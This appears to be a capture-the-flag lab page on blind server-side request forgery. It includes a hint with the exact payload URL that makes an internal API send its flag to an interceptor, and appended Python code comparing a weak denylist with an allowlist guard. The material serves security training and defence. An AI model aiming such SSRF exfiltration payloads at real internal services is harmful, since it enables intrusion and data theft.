Blind SSRF Lab

Server-Side Request Forgery with no response feedback

BLIND SSRF Challenge

This is a blind SSRF lab. The server will fetch the URL you provide, but it will NOT show you the response. You can only see whether the request was sent or blocked. Use the interceptor to detect requests and exfiltrate flags from the internal API.

Levels:
Level 1 - No Filter
Level 2 - Hostname Blocked
Level 3 - Host + IP Blocked

Level 1 - No Filter (Difficulty: Medium)

Clue:

There is an internal API server reachable at http://blind-internal-api (IP: 172.32.0.50). It has an endpoint /exfil?level=1&target=URL that will send its flag to the given URL. You have an interceptor at http://blind-ssrf-app/interceptor/ that logs all incoming requests. Can you make the server fetch the exfil endpoint and get the flag to your interceptor?

Hint:
Simply submit the exfil URL: http://blind-internal-api/exfil?level=1&target=http://blind-ssrf-app/interceptor/. The internal API will receive the request and send the flag to your interceptor. Check the interceptor logs to find the flag!

Submit URL

Enter a URL for the server to fetch. The response will not be shown to you.

Interceptor Endpoint

The interceptor logs all incoming requests, including exfiltrated flags. Use it as the target parameter in your exfil URL.

Network Topology

+-------------------------------------------------------+
| Docker Network                                        |
|                                                       |
|  +-------------------+      +----------------------+  |
|  | blind-ssrf-app    |      | blind-internal-api   |  |
|  | (This Server)     | -->  | (Internal API)       |  |
|  | Port: 8042        |      | IP: 172.32.0.50      |  |
|  |                   |      |                      |  |
|  | /interceptor/     |      | /exfil?level=N       |  |
|  | /redirect?dest=   |      |   &target=URL        |  |
|  +-------------------+      |                      |  |
|         ^                   | Flags: level 1, 2, 3 |  |
|         |                   +----------------------+  |
|         |                                             |
|         +--- Flag exfiltration comes back here        |
+-------------------------------------------------------+
|                                                       |
| Your Browser --> http://localhost:8042                |
|                                                       |
+-------------------------------------------------------+

Level 1 Note:

No filtering is applied. All HTTP/HTTPS URLs are allowed. The internal API hostname blind-internal-api and IP 172.32.0.50 can be reached directly.
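The three levels differ only in how the fetch target is screened. The guard below is an added example (not the lab's own code) contrasting a Level-2/3 style denylist with an allowlist that validates the resolved address; it relies on a constructed name-to-IP table instead of DNS, and the allowed host, the 172.32.0.0/16 subnet and the external addresses are assumptions. One detail worth knowing as a defender: 172.32.0.50 lies outside RFC 1918 space (172.16.0.0/12 ends at 172.31.255.255), so a generic "private IP" test does not cover it.

```python
import ipaddress
from urllib.parse import urlparse

# Constructed name->IP table standing in for DNS so the example runs offline.
# blind-internal-api / 172.32.0.50 and blind-ssrf-app come from the lab; the
# other addresses, the allowlist and the subnet below are assumptions.
FAKE_DNS = {
    "blind-internal-api": "172.32.0.50",
    "blind-ssrf-app": "172.32.0.10",
    "example.org": "93.184.216.34",
}
ALLOWED_HOSTS = {"example.org"}                     # only legitimate fetch targets
OWN_NETS = [ipaddress.ip_network("172.32.0.0/16")]  # assumed Docker subnet of the lab


def resolve(host: str):
    """Return an ip_address for an IP literal or a FAKE_DNS name, else None."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        addr = FAKE_DNS.get(host)
        return ipaddress.ip_address(addr) if addr else None


def denylist_allows(url: str) -> bool:
    """Level-2/3 style guard: one blocked hostname plus a generic private-IP test.
    172.32.0.50 is outside RFC 1918, so ip.is_private is False and it passes."""
    host = urlparse(url).hostname or ""
    ip = resolve(host)
    if host == "blind-internal-api" or ip is None:
        return False
    return not (ip.is_private or ip.is_loopback or ip.is_link_local)


def allowlist_allows(url: str) -> bool:
    """Defensive guard: scheme and host must be explicitly allowed, and the
    *resolved* address must be global and outside the subnets we live in."""
    p = urlparse(url)
    if p.scheme not in ("http", "https") or p.hostname not in ALLOWED_HOSTS:
        return False
    ip = resolve(p.hostname)
    return ip is not None and ip.is_global and not any(ip in n for n in OWN_NETS)


def chain_allows(check, hops) -> bool:
    """Apply the guard to every hop: the fetcher must not auto-follow redirects,
    it re-checks each Location it is handed before issuing the next request."""
    return all(check(u) for u in hops)
```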